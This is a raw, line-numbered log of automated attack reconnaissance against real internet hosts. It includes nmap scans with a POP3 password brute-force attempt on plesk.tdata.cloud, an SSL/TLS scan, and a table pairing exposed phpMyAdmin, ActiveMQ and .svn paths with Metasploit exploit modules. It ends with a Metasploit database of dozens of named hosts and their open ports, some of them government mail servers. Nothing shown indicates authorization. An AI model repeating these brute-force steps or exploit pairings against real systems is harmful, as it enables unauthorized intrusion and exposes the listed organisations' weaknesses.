5818NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
5819NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
5820Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5821Host is up (0.32s latency).
5822
5823PORT STATE SERVICE VERSION
5824110/tcp open pop3 Dovecot pop3d
5825| pop3-brute:
5826| Accounts: No valid accounts found
5827|_ Statistics: Performed 211 guesses in 195 seconds, average tps: 1.1
5828|_pop3-capabilities: UIDL STLS APOP TOP USER CAPA SASL(PLAIN LOGIN CRAM-MD5) AUTH-RESP-CODE PIPELINING RESP-CODES
5829Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5830Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), Oracle VM Server 3.4.2 (Linux 4.1) (86%)
5831No exact OS matches for host (test conditions non-ideal).
5832Network Distance: 19 hops
5833
5834TRACEROUTE (using port 110/tcp)
5835HOP RTT ADDRESS
58361 209.79 ms 10.202.5.1
58372 209.83 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
58383 209.85 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
58394 209.87 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
58405 324.77 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
58416 324.83 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
58427 324.85 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
58438 324.82 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
58449 324.88 ms 176.52.248.217
584510 439.59 ms 5.53.6.50
584611 454.06 ms 94.142.116.84
584712 609.30 ms 5.53.0.213
584813 ...
584914 609.30 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
585015 487.69 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
585116 ... 18
585219 487.57 ms plesk.tdata.cloud (200.54.230.247)
5853#####################################################################################################################################
5854Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:04 EDT
5855Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5856Host is up (0.36s latency).
5857
5858PORT STATE SERVICE VERSION
5859123/tcp filtered ntp
5860123/udp filtered ntp
5861Too many fingerprints match this host to give specific OS details
5862Network Distance: 19 hops
5863
5864TRACEROUTE (using port 123/udp)
5865HOP RTT ADDRESS
58661 276.59 ms 10.202.5.1
58672 276.67 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
58683 276.70 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
58694 276.74 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
58705 276.76 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
58716 276.81 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
58727 276.84 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
58738 276.82 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
58749 276.88 ms 176.52.248.230
587510 ...
587611 460.14 ms 176.52.248.54
587712 460.13 ms 94.142.122.30
587813 ...
587914 574.26 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
588015 460.08 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
588116 ... 18
588219 574.19 ms plesk.tdata.cloud (200.54.230.247)
5883#####################################################################################################################################
5884Version: 2.0.0-static
5885OpenSSL 1.1.1e-dev xx XXX xxxx
5886
5887Connected to 200.54.230.247
5888
5889Testing SSL server 200.54.230.247 on port 443 using SNI name 200.54.230.247
5890
5891 SSL/TLS Protocols:
5892SSLv2 disabled
5893SSLv3 disabled
5894TLSv1.0 disabled
5895TLSv1.1 enabled
5896TLSv1.2 enabled
5897TLSv1.3 disabled
5898
5899 TLS Fallback SCSV:
5900Server supports TLS Fallback SCSV
5901
5902 TLS renegotiation:
5903Session renegotiation not supported
5904
5905 TLS Compression:
5906Compression disabled
5907
5908 Heartbleed:
5909TLSv1.2 not vulnerable to heartbleed
5910TLSv1.1 not vulnerable to heartbleed
5911
5912 Supported Server Cipher(s):
5913Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve 25519 DHE 253
5914Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve 25519 DHE 253
5915Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305 Curve 25519 DHE 253
5916Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve 25519 DHE 253
5917Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve 25519 DHE 253
5918Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
5919Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
5920Accepted TLSv1.2 256 bits ECDHE-ARIA256-GCM-SHA384 Curve 25519 DHE 253
5921Accepted TLSv1.2 128 bits ECDHE-ARIA128-GCM-SHA256 Curve 25519 DHE 253
5922Accepted TLSv1.2 256 bits ECDHE-RSA-CAMELLIA256-SHA384 Curve 25519 DHE 253
5923Accepted TLSv1.2 128 bits ECDHE-RSA-CAMELLIA128-SHA256 Curve 25519 DHE 253
5924Accepted TLSv1.2 128 bits AES128-GCM-SHA256
5925Accepted TLSv1.2 256 bits AES256-GCM-SHA384
5926Accepted TLSv1.2 128 bits AES128-SHA256
5927Accepted TLSv1.2 256 bits AES256-SHA256
5928Accepted TLSv1.2 128 bits AES128-SHA
5929Accepted TLSv1.2 256 bits AES256-SHA
5930Accepted TLSv1.2 256 bits AES256-CCM8
5931Accepted TLSv1.2 256 bits AES256-CCM
5932Accepted TLSv1.2 256 bits ARIA256-GCM-SHA384
5933Accepted TLSv1.2 128 bits AES128-CCM8
5934Accepted TLSv1.2 128 bits AES128-CCM
5935Accepted TLSv1.2 128 bits ARIA128-GCM-SHA256
5936Accepted TLSv1.2 256 bits CAMELLIA256-SHA256
5937Accepted TLSv1.2 128 bits CAMELLIA128-SHA256
5938Accepted TLSv1.2 256 bits CAMELLIA256-SHA
5939Accepted TLSv1.2 128 bits CAMELLIA128-SHA
5940Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
5941Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
5942Accepted TLSv1.1 128 bits AES128-SHA
5943Accepted TLSv1.1 256 bits AES256-SHA
5944Accepted TLSv1.1 256 bits CAMELLIA256-SHA
5945Accepted TLSv1.1 128 bits CAMELLIA128-SHA
5946
5947 Server Key Exchange Group(s):
5948TLSv1.2 128 bits secp256r1 (NIST P-256)
5949TLSv1.2 192 bits secp384r1 (NIST P-384)
5950TLSv1.2 260 bits secp521r1 (NIST P-521)
5951TLSv1.2 128 bits x25519
5952TLSv1.2 224 bits x448
5953
5954 Server Signature Algorithm(s):
5955TLSv1.2 rsa_pkcs1_sha1
5956TLSv1.2 rsa_pkcs1_sha224
5957TLSv1.2 rsa_pkcs1_sha256
5958TLSv1.2 rsa_pkcs1_sha384
5959TLSv1.2 rsa_pkcs1_sha512
5960TLSv1.2 rsa_pss_rsae_sha256
5961TLSv1.2 rsa_pss_rsae_sha384
5962TLSv1.2 rsa_pss_rsae_sha512
5963
5964 SSL Certificate:
5965Signature Algorithm: sha256WithRSAEncryption
5966RSA Key Strength: 2048
5967
5968Subject: plesk.tdata.cloud
5969Altnames: DNS:plesk.tdata.cloud
5970Issuer: Let's Encrypt Authority X3
5971
5972Not valid before: Jan 28 15:44:32 2020 GMT
5973Not valid after: Apr 27 15:44:32 2020 GMT
5974
5975####################################################################################################################################
5976| App Name | URL to Application | Potential Exploit | Username | Password |
5977+-----------------+--------------------------------------------+---------------------------------------------------------------+----------+----------+
5978| phpMyAdmin | https://200.54.230.247:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
5979| Apache ActiveMQ | https://200.54.230.247:443/admin/index.jsp | ./auxiliary/scanner/http/apache_activemq_source_disclosure.rb | None | None |
5980| SVN | http://200.54.230.247:80/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | None | None |
5981+-----------------+--------------------------------------------+---------------------------------------------------------------+----------+----------+
5982####################################################################################################################################
5983Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:31 EDT
5984Warning: 200.54.230.247 giving up on port because retransmission cap hit (2).
5985Nmap scan report for plesk.tdata.cloud (200.54.230.247)
5986Host is up (0.36s latency).
5987
5988PORT STATE SERVICE VERSION
598953/tcp open domain (unknown banner: none)
5990| fingerprint-strings:
5991| DNSVersionBindReqTCP:
5992| version
5993| bind
5994|_ none
599567/tcp filtered dhcps
599668/tcp filtered dhcpc
599769/tcp filtered tftp
599888/tcp filtered kerberos-sec
5999123/tcp filtered ntp
6000137/tcp filtered netbios-ns
6001138/tcp filtered netbios-dgm
6002139/tcp filtered netbios-ssn
6003161/tcp filtered snmp
6004162/tcp filtered snmptrap
6005389/tcp filtered ldap
6006520/tcp filtered efs
60072049/tcp filtered nfs
600853/udp open domain (unknown banner: none)
6009| dns-nsid:
6010|_ bind.version: none
6011| fingerprint-strings:
6012| DNSVersionBindReq:
6013| version
6014| bind
6015| none
6016| NBTStat:
6017|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
601867/udp open|filtered dhcps
601968/udp open|filtered dhcpc
602069/udp open|filtered tftp
602188/udp open|filtered kerberos-sec
6022123/udp open|filtered ntp
6023137/udp open|filtered netbios-ns
6024138/udp open|filtered netbios-dgm
6025139/udp filtered netbios-ssn
6026161/udp open|filtered snmp
6027162/udp open|filtered snmptrap
6028389/udp filtered ldap
6029520/udp filtered route
60302049/udp open|filtered nfs
60312 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
6032==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
6033SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6AAA5D%P=x86_64-pc-linux-gnu%r(DNSV
6034SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
6035SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
6036SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
6037==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
6038SF-Port53-UDP:V=7.80%I=7%D=3/12%Time=5E6AAA56%P=x86_64-pc-linux-gnu%r(DNSV
6039SF:ersionBindReq,3D,"\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind
6040SF:\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0\x02\
6041SF:0\x03\0\0\0\0\0\x02\xc0\x0c")%r(DNSStatusRequest,C,"\0\0\x90\x04\0\0\0\
6042SF:0\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x15\0\x01\0\0\0\0\0\0\x20CKAAAAA
6043SF:AAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
6044Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
6045Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.18 (91%), Linux 3.2 - 4.9 (91%), Crestron XPanel control system (89%), Linux 3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%)
6046No exact OS matches for host (test conditions non-ideal).
6047Network Distance: 20 hops
6048
6049TRACEROUTE (using port 53/tcp)
6050HOP RTT ADDRESS
60511 296.28 ms 10.202.5.1
60522 296.31 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
60533 296.34 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
60544 296.36 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
60555 296.38 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
60566 296.42 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
60577 296.44 ms be3187.agr41.fra03.atlas.cogentco.com (130.117.1.117)
60588 296.42 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
60599 411.12 ms 176.52.248.119
606010 ...
606111 479.31 ms 94.142.98.130
606212 360.37 ms 5.53.0.213
606313 ...
606414 479.27 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
606515 479.27 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
606616 ... 19
606720 344.19 ms plesk.tdata.cloud (200.54.230.247)
6068#####################################################################################################################################
6069Hosts
6070=====
6071
6072address mac name os_name os_flavor os_sp purpose info comments
6073------- --- ---- ------- --------- ----- ------- ---- --------
60743.83.211.23 ec2-3-83-211-23.compute-1.amazonaws.com embedded device
60753.216.98.236 ec2-3-216-98-236.compute-1.amazonaws.com Linux 3.X server
607634.224.171.238 ec2-34-224-171-238.compute-1.amazonaws.com Linux server
607734.236.0.217 ec2-34-236-0-217.compute-1.amazonaws.com Linux 3.X server
607837.1.207.121 teens-sins.net 2-Series 3.X device
607943.245.223.4 Linux 2.6.X server
608045.60.47.218 Linux 3.X server
608145.88.202.111 Linux 3.X server
608245.239.108.252 whale.ecohosting.cl Linux 3.X server
608352.1.2.24 ec2-52-1-2-24.compute-1.amazonaws.com Linux server
608452.1.174.10 ec2-52-1-174-10.compute-1.amazonaws.com Linux 3.X server
608552.52.234.222 ec2-52-52-234-222.us-west-1.compute.amazonaws.com Unknown device
608654.85.59.109 ec2-54-85-59-109.compute-1.amazonaws.com Linux 3.X server
608764.69.94.253 Unknown device
608869.163.233.4 ps54052.dreamhostps.com Linux 14.04 server
608974.117.180.192 embedded device
609082.94.222.131 Unknown device
609192.123.250.35 a92-123-250-35.deploy.static.akamaitechnologies.com embedded device
609292.123.250.65 a92-123-250-65.deploy.static.akamaitechnologies.com Linux 3.X server
6093104.244.73.40 Unknown device
6094104.244.76.231 Linux 3.X server
6095104.244.77.188 Linux 3.X server
6096104.244.79.89 Linux 3.X server
6097107.180.28.114 ip-107-180-28-114.ip.secureserver.net Unknown device
6098111.90.145.39 web16.support-emilid.com Linux 2.6.X server
6099143.95.110.248 ip-143-95-110-248.iplocal Linux 3.X server
6100149.126.72.220 149.126.72.220.ip.incapdns.net Linux 3.X server
6101151.106.38.107 ns3152160.ip-151-106-38.eu embedded device
6102158.69.13.254 ip254.ip-158-69-13.net 2-Series 2.6.X device
6103162.244.35.13 xnlog.com FreeBSD 7.X device
6104163.247.48.46 Unknown device
6105163.247.127.20 Unknown device
6106163.247.130.114 embedded device
6107165.22.143.229 Linux 2.6.X server
6108169.239.218.20 cp10.domains.co.za Linux 2.6.X server
6109173.214.244.169 173.214.244.169.serverel.net Unknown device
6110174.142.53.51 mail.marineland.ca Linux 3.X server
6111186.64.118.40 mail.blue127.dnsmisitio.net embedded device
6112190.98.209.37 static.190.98.209.37.gtdinternet.com Unknown device
6113190.107.177.35 srv25.cpanelhost.cl Linux 2.6.X server
6114190.110.121.175 todofutbol.hn.cl Unknown device
6115190.153.209.187 static.190.153.209.187.gtdinternet.com Unknown device
6116190.153.219.254 mail.evopoli.cl Linux 3.X server
6117192.185.134.58 ns36.accountservergroup.com Linux 3.X server
6118200.2.249.28 Linux 3.X server
6119200.29.0.33 cp33.puntoweb.cl Unknown device
6120200.54.92.108 Linux 9.0 server
6121200.54.230.247 plesk.tdata.cloud Linux 3.X server
6122200.55.198.228 Linux 2.4.X server
6123200.68.30.227 mail.gorecoquimbo.cl Unknown device
6124200.68.34.99 Unknown device
6125200.73.54.34 mail.maxtel.cl Linux 2.6.X server
6126200.91.40.252 200-91-40-252.avz.cl Unknown device
6127200.126.100.83 toqui.gorearaucania.cl Unknown device
6128201.159.170.136 soloweb.sinc.cl Unknown device
6129204.93.193.141 suzuka.mochahost.com Unknown device
6130206.48.140.40 Unknown device
6131207.246.147.189 2-Series device
6132207.246.147.190 Linux 4.X server
6133207.246.147.247 Linux 4.X server
6134207.246.147.248 Linux 4.X server
6135211.13.196.135 sv3.isle.ne.jp Linux 2.6.X server
6136212.174.0.150 Windows 2012 server
6137216.172.184.117 Linux 3.X server
6138218.45.5.97 www.town.koya.wakayama.jp Linux 2.6.X server
6139####################################################################################################################################
6140Services
6141========
6142
6143host port proto name state info
6144---- ---- ----- ---- ----- ----
61453.83.211.23 53 tcp domain filtered
61463.83.211.23 53 udp domain unknown
61473.83.211.23 67 tcp dhcps filtered
61483.83.211.23 67 udp dhcps unknown
61493.83.211.23 68 tcp dhcpc filtered
61503.83.211.23 68 udp dhcpc unknown
61513.83.211.23 69 tcp tftp filtered
61523.83.211.23 69 udp tftp unknown
61533.83.211.23 80 tcp http open Microsoft IIS httpd 10.0
61543.83.211.23 88 tcp kerberos-sec filtered
61553.83.211.23 88 udp kerberos-sec unknown
61563.83.211.23 123 tcp ntp filtered
61573.83.211.23 123 udp ntp unknown
61583.83.211.23 137 tcp netbios-ns filtered
61593.83.211.23 137 udp netbios-ns unknown
61603.83.211.23 138 tcp netbios-dgm filtered
61613.83.211.23 138 udp netbios-dgm unknown
61623.83.211.23 139 tcp netbios-ssn filtered
61633.83.211.23 139 udp netbios-ssn unknown
61643.83.211.23 161 tcp snmp filtered
61653.83.211.23 161 udp snmp unknown
61663.83.211.23 162 tcp snmptrap filtered
61673.83.211.23 162 udp snmptrap unknown
61683.83.211.23 389 tcp ldap filtered
61693.83.211.23 389 udp ldap unknown
61703.83.211.23 443 tcp ssl/http open Microsoft IIS httpd 10.0
61713.83.211.23 520 tcp efs filtered
61723.83.211.23 520 udp route unknown
61733.83.211.23 2049 tcp nfs filtered
61743.83.211.23 2049 udp nfs unknown
61753.216.98.236 53 tcp domain filtered
61763.216.98.236 53 udp domain unknown
61773.216.98.236 67 tcp dhcps filtered
61783.216.98.236 67 udp dhcps unknown
61793.216.98.236 68 tcp dhcpc filtered
61803.216.98.236 68 udp dhcpc unknown
61813.216.98.236 69 tcp tftp filtered
61823.216.98.236 69 udp tftp unknown
61833.216.98.236 80 tcp http open Microsoft IIS httpd 10.0
61843.216.98.236 88 tcp kerberos-sec filtered
61853.216.98.236 88 udp kerberos-sec unknown
61863.216.98.236 123 tcp ntp filtered
61873.216.98.236 123 udp ntp unknown
61883.216.98.236 137 tcp netbios-ns filtered
61893.216.98.236 137 udp netbios-ns unknown
61903.216.98.236 138 tcp netbios-dgm filtered
61913.216.98.236 138 udp netbios-dgm unknown
61923.216.98.236 139 tcp netbios-ssn filtered
61933.216.98.236 139 udp netbios-ssn unknown
61943.216.98.236 161 tcp snmp filtered
61953.216.98.236 161 udp snmp unknown
61963.216.98.236 162 tcp snmptrap filtered
61973.216.98.236 162 udp snmptrap unknown
61983.216.98.236 389 tcp ldap filtered
61993.216.98.236 389 udp ldap unknown
62003.216.98.236 443 tcp ssl/http open Microsoft IIS httpd 10.0
62013.216.98.236 520 tcp efs filtered
62023.216.98.236 520 udp route unknown
62033.216.98.236 2049 tcp nfs filtered
62043.216.98.236 2049 udp nfs unknown
620534.224.171.238 53 tcp domain filtered
620634.224.171.238 53 udp domain unknown
620734.224.171.238 67 tcp dhcps filtered
620834.224.171.238 67 udp dhcps unknown
620934.224.171.238 68 tcp dhcpc filtered
621034.224.171.238 68 udp dhcpc unknown
621134.224.171.238 69 tcp tftp filtered
621234.224.171.238 69 udp tftp unknown
621334.224.171.238 80 tcp http open Apache httpd 2.4.29 (Ubuntu)
621434.224.171.238 88 tcp kerberos-sec filtered
621534.224.171.238 88 udp kerberos-sec unknown
621634.224.171.238 123 tcp ntp filtered
621734.224.171.238 123 udp ntp unknown
621834.224.171.238 137 tcp netbios-ns filtered
621934.224.171.238 137 udp netbios-ns unknown
622034.224.171.238 138 tcp netbios-dgm filtered
622134.224.171.238 138 udp netbios-dgm unknown
622234.224.171.238 139 tcp netbios-ssn filtered
622334.224.171.238 139 udp netbios-ssn unknown
622434.224.171.238 161 tcp snmp filtered
622534.224.171.238 161 udp snmp unknown
622634.224.171.238 162 tcp snmptrap filtered
622734.224.171.238 162 udp snmptrap unknown
622834.224.171.238 389 tcp ldap filtered
622934.224.171.238 389 udp ldap unknown
623034.224.171.238 443 tcp ssl/http open Apache httpd 2.4.29 (Ubuntu)
623134.224.171.238 520 tcp efs filtered
623234.224.171.238 520 udp route unknown
623334.224.171.238 2049 tcp nfs filtered
623434.224.171.238 2049 udp nfs unknown
623534.236.0.217 53 tcp domain filtered
623634.236.0.217 53 udp domain unknown
623734.236.0.217 67 tcp dhcps filtered
623834.236.0.217 67 udp dhcps unknown
623934.236.0.217 68 tcp dhcpc filtered
624034.236.0.217 68 udp dhcpc unknown
624134.236.0.217 69 tcp tftp filtered
624234.236.0.217 69 udp tftp unknown
624334.236.0.217 80 tcp http open nginx
624434.236.0.217 88 tcp kerberos-sec filtered
624534.236.0.217 88 udp kerberos-sec unknown
624634.236.0.217 123 tcp ntp filtered
624734.236.0.217 123 udp ntp unknown
624834.236.0.217 137 tcp netbios-ns filtered
624934.236.0.217 137 udp netbios-ns unknown
625034.236.0.217 138 tcp netbios-dgm filtered
625134.236.0.217 138 udp netbios-dgm unknown
625234.236.0.217 139 tcp netbios-ssn filtered
625334.236.0.217 139 udp netbios-ssn unknown
625434.236.0.217 161 tcp snmp filtered
625534.236.0.217 161 udp snmp unknown
625634.236.0.217 162 tcp snmptrap filtered
625734.236.0.217 162 udp snmptrap unknown
625834.236.0.217 389 tcp ldap filtered
625934.236.0.217 389 udp ldap unknown
626034.236.0.217 443 tcp ssl/http open nginx
626134.236.0.217 520 tcp efs filtered
626234.236.0.217 520 udp route unknown
626334.236.0.217 2049 tcp nfs filtered
626434.236.0.217 2049 udp nfs unknown
626537.1.207.121 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
626637.1.207.121 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
626737.1.207.121 67 tcp dhcps filtered
626837.1.207.121 67 udp dhcps unknown
626937.1.207.121 68 tcp dhcpc filtered
627037.1.207.121 68 udp dhcpc filtered
627137.1.207.121 69 tcp tftp filtered
627237.1.207.121 69 udp tftp unknown
627337.1.207.121 88 tcp kerberos-sec filtered
627437.1.207.121 88 udp kerberos-sec filtered
627537.1.207.121 123 tcp ntp filtered
627637.1.207.121 123 udp ntp unknown
627737.1.207.121 137 tcp netbios-ns filtered
627837.1.207.121 137 udp netbios-ns unknown
627937.1.207.121 138 tcp netbios-dgm filtered
628037.1.207.121 138 udp netbios-dgm unknown
628137.1.207.121 139 tcp netbios-ssn filtered
628237.1.207.121 139 udp netbios-ssn unknown
628337.1.207.121 161 tcp snmp filtered
628437.1.207.121 161 udp snmp unknown
628537.1.207.121 162 tcp snmptrap filtered
628637.1.207.121 162 udp snmptrap unknown
628737.1.207.121 389 tcp ldap filtered
628837.1.207.121 389 udp ldap unknown
628937.1.207.121 520 tcp efs filtered
629037.1.207.121 520 udp route unknown
629137.1.207.121 2049 tcp nfs filtered
629237.1.207.121 2049 udp nfs filtered
629343.245.223.4 80 tcp http open nginx
629443.245.223.4 443 tcp ssl/http open nginx
629543.245.223.4 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
629645.60.47.218 25 tcp http open Incapsula CDN httpd
629745.60.47.218 53 tcp domain open
629845.60.47.218 53 udp domain open
629945.60.47.218 67 udp dhcps unknown
630045.60.47.218 68 udp dhcpc unknown
630145.60.47.218 69 udp tftp unknown
630245.60.47.218 80 tcp http open Incapsula CDN httpd
630345.60.47.218 81 tcp http open Incapsula CDN httpd
630445.60.47.218 85 tcp http open Incapsula CDN httpd
630545.60.47.218 88 tcp http open Incapsula CDN httpd
630645.60.47.218 88 udp kerberos-sec unknown
630745.60.47.218 123 udp ntp unknown
630845.60.47.218 137 udp netbios-ns unknown
630945.60.47.218 138 udp netbios-dgm unknown
631045.60.47.218 139 udp netbios-ssn unknown
631145.60.47.218 161 udp snmp unknown
631245.60.47.218 162 udp snmptrap unknown
631345.60.47.218 389 tcp ssl/http open Incapsula CDN httpd
631445.60.47.218 389 udp ldap unknown
631545.60.47.218 443 tcp ssl/http open Incapsula CDN httpd
631645.60.47.218 444 tcp ssl/http open Incapsula CDN httpd
631745.60.47.218 445 tcp ssl/http open Incapsula CDN httpd
631845.60.47.218 446 tcp http open Incapsula CDN httpd
631945.60.47.218 520 udp route unknown
632045.60.47.218 587 tcp http open Incapsula CDN httpd
632145.60.47.218 631 tcp http open Incapsula CDN httpd
632245.60.47.218 888 tcp http open Incapsula CDN httpd
632345.60.47.218 995 tcp ssl/http open Incapsula CDN httpd
632445.60.47.218 998 tcp ssl/http open Incapsula CDN httpd
632545.60.47.218 999 tcp http open Incapsula CDN httpd
632645.60.47.218 1000 tcp http open Incapsula CDN httpd
632745.60.47.218 1024 tcp http open Incapsula CDN httpd
632845.60.47.218 1103 tcp http open Incapsula CDN httpd
632945.60.47.218 1234 tcp http open Incapsula CDN httpd
633045.60.47.218 1433 tcp http open Incapsula CDN httpd
633145.60.47.218 1494 tcp http open Incapsula CDN httpd
633245.60.47.218 2000 tcp ssl/http open Incapsula CDN httpd
633345.60.47.218 2001 tcp http open Incapsula CDN httpd
633445.60.47.218 2049 tcp http open Incapsula CDN httpd
633545.60.47.218 2049 udp nfs unknown
633645.60.47.218 2067 tcp http open Incapsula CDN httpd
633745.60.47.218 2100 tcp ssl/http open Incapsula CDN httpd
633845.60.47.218 2222 tcp http open Incapsula CDN httpd
633945.60.47.218 2598 tcp http open Incapsula CDN httpd
634045.60.47.218 3000 tcp http open Incapsula CDN httpd
634145.60.47.218 3050 tcp http open Incapsula CDN httpd
634245.60.47.218 3057 tcp http open Incapsula CDN httpd
634345.60.47.218 3299 tcp http open Incapsula CDN httpd
634445.60.47.218 3306 tcp ssl/http open Incapsula CDN httpd
634545.60.47.218 3333 tcp http open Incapsula CDN httpd
634645.60.47.218 3389 tcp ssl/http open Incapsula CDN httpd
634745.60.47.218 3500 tcp http open Incapsula CDN httpd
634845.60.47.218 3790 tcp http open Incapsula CDN httpd
634945.60.47.218 4000 tcp http open Incapsula CDN httpd
635045.60.47.218 4444 tcp ssl/http open Incapsula CDN httpd
635145.60.47.218 4445 tcp ssl/http open Incapsula CDN httpd
635245.60.47.218 4848 tcp http open Incapsula CDN httpd
635345.60.47.218 5000 tcp http open Incapsula CDN httpd
635445.60.47.218 5009 tcp http open Incapsula CDN httpd
635545.60.47.218 5051 tcp ssl/http open Incapsula CDN httpd
635645.60.47.218 5060 tcp ssl/http open Incapsula CDN httpd
635745.60.47.218 5061 tcp ssl/http open Incapsula CDN httpd
635845.60.47.218 5227 tcp ssl/http open Incapsula CDN httpd
635945.60.47.218 5247 tcp ssl/http open Incapsula CDN httpd
636045.60.47.218 5250 tcp ssl/http open Incapsula CDN httpd
636145.60.47.218 5555 tcp http open Incapsula CDN httpd
636245.60.47.218 5900 tcp http open Incapsula CDN httpd
636345.60.47.218 5901 tcp ssl/http open Incapsula CDN httpd
636445.60.47.218 5902 tcp ssl/http open Incapsula CDN httpd
636545.60.47.218 5903 tcp ssl/http open Incapsula CDN httpd
636645.60.47.218 5904 tcp ssl/http open Incapsula CDN httpd
636745.60.47.218 5905 tcp ssl/http open Incapsula CDN httpd
636845.60.47.218 5906 tcp ssl/http open Incapsula CDN httpd
636945.60.47.218 5907 tcp ssl/http open Incapsula CDN httpd
637045.60.47.218 5908 tcp ssl/http open Incapsula CDN httpd
637145.60.47.218 5909 tcp ssl/http open Incapsula CDN httpd
637245.60.47.218 5910 tcp ssl/http open Incapsula CDN httpd
637345.60.47.218 5920 tcp ssl/http open Incapsula CDN httpd
637445.60.47.218 5984 tcp ssl/http open Incapsula CDN httpd
637545.60.47.218 5985 tcp http open Incapsula CDN httpd
637645.60.47.218 5986 tcp ssl/http open Incapsula CDN httpd
637745.60.47.218 5999 tcp ssl/http open Incapsula CDN httpd
637845.60.47.218 6000 tcp http open Incapsula CDN httpd
637945.60.47.218 6060 tcp http open Incapsula CDN httpd
638045.60.47.218 6161 tcp http open Incapsula CDN httpd
638145.60.47.218 6379 tcp http open Incapsula CDN httpd
638245.60.47.218 6661 tcp ssl/http open Incapsula CDN httpd
638345.60.47.218 6789 tcp http open Incapsula CDN httpd
638445.60.47.218 7000 tcp ssl/http open Incapsula CDN httpd
638545.60.47.218 7001 tcp http open Incapsula CDN httpd
638645.60.47.218 7021 tcp http open Incapsula CDN httpd
638745.60.47.218 7071 tcp ssl/http open Incapsula CDN httpd
638845.60.47.218 7080 tcp http open Incapsula CDN httpd
638945.60.47.218 7272 tcp ssl/http open Incapsula CDN httpd
639045.60.47.218 7443 tcp ssl/http open Incapsula CDN httpd
639145.60.47.218 7700 tcp http open Incapsula CDN httpd
639245.60.47.218 7777 tcp http open Incapsula CDN httpd
639345.60.47.218 7778 tcp http open Incapsula CDN httpd
639445.60.47.218 8000 tcp http open Incapsula CDN httpd
639545.60.47.218 8001 tcp http open Incapsula CDN httpd
639645.60.47.218 8008 tcp http open Incapsula CDN httpd
639745.60.47.218 8014 tcp http open Incapsula CDN httpd
